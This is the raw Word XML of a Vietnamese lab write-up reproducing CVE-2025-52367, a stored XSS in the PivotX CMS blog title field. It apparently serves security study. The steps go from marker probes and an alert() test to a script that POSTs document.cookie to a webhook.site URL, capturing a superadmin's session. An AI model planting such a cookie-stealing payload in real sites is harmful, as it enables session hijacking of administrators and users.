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BD9E0" w14:textId="508F1120" w:rsidR="00BF4741" w:rsidRDefault="00BF4741" w:rsidP="00BF4741">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="286" w:after="480" w:line="780" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4741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</w:rPr>
        <w:t>CVE-2025–52367</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68D9F0" w14:textId="77777777" w:rsidR="00BF4741" w:rsidRPr="00BF4741" w:rsidRDefault="00BF4741" w:rsidP="00BF4741">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="96" w:after="12" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4741">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B90D517" w14:textId="2A0D2A02" w:rsidR="00BF4741" w:rsidRPr="00BF4741" w:rsidRDefault="00BF4741" w:rsidP="00BF4741">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4741">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Cross Site Scripting vulnerability in PivotX CMS v.3.0.0 RC 3 allows a remote attacker to execute arbitrary code via the subtitle field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636BBE14" w14:textId="77777777" w:rsidR="00BF4741" w:rsidRPr="00BF4741" w:rsidRDefault="00BF4741" w:rsidP="00BF4741">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F5F5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4741">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Base Score:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4741">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00BF4741">
          <w:rPr>
            <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EC971F"/>
          </w:rPr>
          <w:t>5.4 MEDIUM</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3767F955" w14:textId="77777777" w:rsidR="00BF4741" w:rsidRPr="00BF4741" w:rsidRDefault="00BF4741" w:rsidP="00BF4741">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F5F5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4741">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Vector:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4741">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>  CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D71AB6" w14:textId="77777777" w:rsidR="007C2764" w:rsidRDefault="007C2764"/>
    <w:p w14:paraId="64C4A5EB" w14:textId="03B13F54" w:rsidR="00B4680E" w:rsidRPr="007C2764" w:rsidRDefault="00B4680E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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>CVE này được thực hiện trên PivotX, một hệ thống quản lý nội dung (CMS) cũ với cơ chế bảo mật nghèo nàn.</w:t>
      </w:r>
      <w:r w:rsidR="007C2764" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Phiên bản được thực hiện trong demo là phiên bản 2.3.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BDE499" w14:textId="6788ECAE" w:rsidR="00A06EB6" w:rsidRPr="007C2764" w:rsidRDefault="00A06EB6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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ta sẽ thực hiện CVE-2025-52367, đây là CVE về lỗ hổng Stored-XSS ở chức năng đăng các bài blog</w:t>
      </w:r>
      <w:r w:rsidR="008332BF" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để thực hiện chiếm phiên của admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606634E" w14:textId="4A563FBF" w:rsidR="00B4680E" w:rsidRPr="007C2764" w:rsidRDefault="008B13EE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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Việc đầu tiên là ta cần tạo 2 user: quyen với quyền Superadmin, quyen2 chỉ là một user bình thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756EEAD5" w14:textId="2A675684" w:rsidR="008B13EE" w:rsidRPr="007C2764" w:rsidRDefault="008B13EE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3F7F97F" wp14:editId="6B2B4FC8">
            <wp:extent cx="5409524" cy="2476190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13B9" w14:textId="1806CC73" w:rsidR="00A06EB6" w:rsidRPr="007C2764" w:rsidRDefault="008332BF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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sau đó ta sẽ dùng account quyen2 để tạo một bài blog bằng cách truy cập tới đường dẫn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE1105" w14:textId="76828CCE" w:rsidR="008332BF" w:rsidRPr="007C2764" w:rsidRDefault="008332BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="007C2764">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://192.168.18.105:8081/pivotx/index.php?page=page&amp;chapter=0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10AD0FC3" w14:textId="78BAB78B" w:rsidR="008332BF" w:rsidRPr="007C2764" w:rsidRDefault="008332BF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9AFE3CC" wp14:editId="5EAB9D34">
            <wp:extent cx="5943600" cy="27165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3FAA" w14:textId="28B29A19" w:rsidR="008332BF" w:rsidRPr="007C2764" w:rsidRDefault="008332BF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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Việc đầu tiên là ta cần kiểm tra nh</w:t>
      </w:r>
      <w:r w:rsidR="00D9777F" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ững input nào bị reflected và những nơi nó được hiện thị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CE751D" w14:textId="25E6D84A" w:rsidR="00D9777F" w:rsidRPr="007C2764" w:rsidRDefault="00D9777F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7C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta sẽ lần lượt cho vào các Payload đặc biệt để có thể dễ dàng tìm kiếm như </w:t>
      </w:r>
      <w:r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qu33n1, qu33n2, qu33n3,…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24045A56" w14:textId="5A1DAFCA" w:rsidR="00D9777F" w:rsidRPr="007C2764" w:rsidRDefault="00D9777F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EDCB19" wp14:editId="484F0CBD">
            <wp:extent cx="5943600" cy="28613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0AAD" w14:textId="52E91869" w:rsidR="00D9777F" w:rsidRPr="007C2764" w:rsidRDefault="00432632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7C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Và những vị trí hiển thị của các giá trị này là hoặc ở ngoài danh sách các Page với </w:t>
      </w:r>
      <w:r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qu33n1, qu33n2, qu33n3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6132C65C" w14:textId="2CEBD194" w:rsidR="00432632" w:rsidRPr="007C2764" w:rsidRDefault="00432632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06CD6F7" wp14:editId="3AD23298">
            <wp:extent cx="5943600" cy="27851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E4DE" w14:textId="3ACAD05C" w:rsidR="00432632" w:rsidRPr="007C2764" w:rsidRDefault="00432632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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hoặc là khi nhấn vào đọc chi tiết bài viết này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20094EC7" w14:textId="31A742C6" w:rsidR="00432632" w:rsidRPr="007C2764" w:rsidRDefault="00432632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150497" wp14:editId="027415E2">
            <wp:extent cx="5943600" cy="2743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82D6" w14:textId="21E9A266" w:rsidR="00432632" w:rsidRPr="007C2764" w:rsidRDefault="00432632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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Vậy thì ta sẽ thử </w:t>
      </w:r>
      <w:r w:rsidR="004060F8" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">payload đơn giản là </w:t>
      </w:r>
      <w:r w:rsidR="004060F8"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&lt;h1&gt;qu33n1&lt;/h1&gt;, </w:t>
      </w:r>
      <w:r w:rsidR="004060F8"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>&lt;h1&gt;qu33n</w:t>
      </w:r>
      <w:r w:rsidR="004060F8"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>2</w:t>
      </w:r>
      <w:r w:rsidR="004060F8"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>&lt;/h1&gt;</w:t>
      </w:r>
      <w:r w:rsidR="004060F8" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, để kiểm tra các ký tự </w:t>
      </w:r>
      <w:r w:rsidR="004060F8"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>&lt;&gt;</w:t>
      </w:r>
      <w:r w:rsidR="004060F8" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> có encode hay trang web có ngăn chặn thực thi các thẻ html không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B07F5DA" w14:textId="597E99C6" w:rsidR="004060F8" w:rsidRPr="007C2764" w:rsidRDefault="004060F8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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ta thấy rõ ràng nhất là vị trí qu33n1 có dấu hiệu khác biệt khi thấy qu33n1 xuống dòng so với trước.</w:t>
      </w:r>
      <w:r w:rsidR="00922A11" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Và khi ta vào kiểm tra trong Devtools thì thấy rất rõ ràng việc </w:t>
      </w:r>
      <w:r w:rsidR="00922A11"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>&lt;h1&gt;qu33n1&lt;/h1</w:t>
      </w:r>
      <w:r w:rsidR="00922A11" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&gt; không bị encode. Đây là một dấu hiệu tốt cho việc có thể thực hiện Stored XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DE306C" w14:textId="77777777" w:rsidR="00922A11" w:rsidRPr="007C2764" w:rsidRDefault="00922A11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A0F67C0" w14:textId="13D9343A" w:rsidR="004060F8" w:rsidRPr="007C2764" w:rsidRDefault="00922A11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EB55B6E" wp14:editId="1058DDFC">
            <wp:extent cx="5943600" cy="27533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CB9D" w14:textId="4CDCFDBA" w:rsidR="004060F8" w:rsidRPr="007C2764" w:rsidRDefault="00922A11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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ta thực hiện payload pop up alert() để xác thực vị trí có bị qu33n1 có bị Stored XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10683D72" w14:textId="3E1E82CA" w:rsidR="00922A11" w:rsidRPr="007C2764" w:rsidRDefault="00922A11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>&lt;script&gt;alert(‘qu33n1’)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5A006B" w14:textId="40CAF6DC" w:rsidR="004060F8" w:rsidRPr="007C2764" w:rsidRDefault="00925D3B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FDA9F0" wp14:editId="5A3BBCE8">
            <wp:extent cx="5943600" cy="25673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977B" w14:textId="0175CF3A" w:rsidR="00925D3B" w:rsidRPr="007C2764" w:rsidRDefault="00925D3B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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Alert xảy ra khi ta nhấp vào đường dẫn của bài viết. Vậy là vị trí qu33n1 tức là title của bài blog có bị XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB9637B" w14:textId="0EB044A3" w:rsidR="00783F50" w:rsidRPr="007C2764" w:rsidRDefault="00925D3B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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta </w:t>
      </w:r>
      <w:r w:rsidR="00BF70E8" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">sẽ thêm payload </w:t>
      </w:r>
      <w:r w:rsidR="00783F50" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>dưới đây</w:t>
      </w:r>
      <w:r w:rsidR="00BF70E8" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để lấy cookie bất cứ người dùng nào truy cập vào trang web này</w:t>
      </w:r>
      <w:r w:rsidR="00783F50" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B7F543" w14:textId="4D262C98" w:rsidR="00BF70E8" w:rsidRPr="007C2764" w:rsidRDefault="00783F50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qu33n1</w:t>
      </w:r>
      <w:r w:rsidR="00925D3B"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>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2795CF" w14:textId="07F45CD0" w:rsidR="00BF70E8" w:rsidRPr="007C2764" w:rsidRDefault="00BF70E8" w:rsidP="00BF70E8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>fetch("</w:t>
      </w:r>
      <w:r w:rsidR="00783F50"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>https://webhook.site/dad81e56-d42b-4885-ba50-3c978a7e60f9</w:t>
      </w:r>
      <w:r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>", {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAAE4FD" w14:textId="77777777" w:rsidR="00BF70E8" w:rsidRPr="007C2764" w:rsidRDefault="00BF70E8" w:rsidP="00BF70E8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   method: "POST",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AA128C" w14:textId="2EEAC30D" w:rsidR="00BF70E8" w:rsidRPr="007C2764" w:rsidRDefault="00BF70E8" w:rsidP="00783F50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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    body: </w:t>
      </w:r>
      <w:r w:rsidR="00783F50"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>document.cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B8531" w14:textId="4E964D51" w:rsidR="00925D3B" w:rsidRPr="007C2764" w:rsidRDefault="00BF70E8" w:rsidP="00BF70E8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>})</w:t>
      </w:r>
      <w:r w:rsidR="00925D3B" w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C60CAC" w14:textId="338C5391" w:rsidR="00BF70E8" w:rsidRPr="007C2764" w:rsidRDefault="00BF70E8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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Và ta vào account quyen với quyền Superadmin để xem bài viết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296EAB1B" w14:textId="06B7C9A3" w:rsidR="00783F50" w:rsidRPr="007C2764" w:rsidRDefault="00783F50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2A6385" wp14:editId="0117BCEF">
            <wp:extent cx="5943600" cy="25501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1728" w14:textId="0B86E26B" w:rsidR="00783F50" w:rsidRPr="007C2764" w:rsidRDefault="00783F50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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Khi quyen truy cập vào trang web này sẽ có một POST request gửi tới Webhook với nội dung chứ cookie của admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A8CA95" w14:textId="40449477" w:rsidR="00783F50" w:rsidRPr="007C2764" w:rsidRDefault="007C2764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66D9FE" wp14:editId="023EDA2D">
            <wp:extent cx="5943600" cy="29438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61D7" w14:textId="5D2ECCC4" w:rsidR="007C2764" w:rsidRPr="007C2764" w:rsidRDefault="007C2764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Vậy là ta đã thành công thực hiện Stored-XSS để chiếm phiên của Superadmin trên PivotX.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67726D9E" w14:textId="77777777" w:rsidR="007C2764" w:rsidRDefault="007C2764"/>
    <w:p w14:paraId="4FF027CE" w14:textId="77777777" w:rsidR="00BF70E8" w:rsidRDefault="00BF70E8"/>
    <w:sectPr w:rsidR="00BF7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741"/>
    <w:rsid w:val="004060F8"/>
    <w:rsid w:val="00432632"/>
    <w:rsid w:val="007602D0"/>
    <w:rsid w:val="00783F50"/>
    <w:rsid w:val="007C2764"/>
    <w:rsid w:val="008332BF"/>
    <w:rsid w:val="008B13EE"/>
    <w:rsid w:val="00922A11"/>
    <w:rsid w:val="00925D3B"/>
    <w:rsid w:val="00A06EB6"/>
    <w:rsid w:val="00B4680E"/>
    <w:rsid w:val="00BF4741"/>
    <w:rsid w:val="00BF70E8"/>
    <w:rsid w:val="00D9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9BF11"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A8F4F3DE-E26F-453D-8950-0F9A835D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47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7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7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BF4741"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="severitydetail">
    <w:name w:val="severitydetail"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BF4741"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF4741"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tooltipcvss3adpmetrics">
    <w:name w:val="tooltipcvss3adpmetrics"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BF4741"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF47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F4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32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192.168.18.105:8081/pivotx/index.php?page=page&amp;chapter=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hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?name=CVE-2025-52367&amp;vector=AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N&amp;version=3.1&amp;source=CISA-ADP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2026-02-12T15:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-12T16:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>